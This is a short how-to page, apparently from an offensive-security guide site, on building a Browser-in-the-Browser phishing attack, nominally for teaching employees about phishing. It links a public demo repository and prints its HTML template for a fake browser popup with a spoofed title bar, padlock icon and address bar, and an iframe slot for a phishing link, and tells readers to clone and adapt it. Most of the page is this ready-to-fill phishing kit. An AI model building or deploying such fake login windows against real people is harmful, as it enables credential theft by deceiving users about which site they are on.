Create a BITB Attack
How to create a BITB attack, to teach your employees about phishing.
Browser In The Browser (BITB) attack, is an attack method, where the website spawns a fake popup, that appears to be legit. You can see the demo bellow the page. The demo for the BITB attack is available at: https://cdn.pwn.guide/bitb
How to create a BITB attack
The demo's source code is available on https://github.com/mrd0x/BITB. To create one yourself, just clone the repository and modify it to your needs. Here's an example from the repository:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="style.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
</head>
<body>
<div id="window">
<!-- Title bar start -->
<div id="title-bar-width">
<div id="title-bar">
<div style="margin-top:5px;">
<img src="./logo.svg" width="20px" height="15px" id="logo">
<span id="logo-description">XX-TITLE-XX</span>
</div>
<div>
<span id="minimize">—</span>
<span id="square">□</span>
<span id="exit">✕</span>
</div>
</div>
<div id="url-bar">
<img src="./ssl.svg" width="20px" height="20px" id="ssl-padlock">
<span id="domain-name">XX-DOMAIN-NAME-XX</span>
<span id="domain-path">XX-DOMAIN-PATH-XX</span>
</div>
</div>
<!-- Content start -->
<iframe id="content" src="XX-PHISHING-LINK-XX" frameBorder="0"></iframe>
</div>
</body>
<script src="script.js"></script>
</html>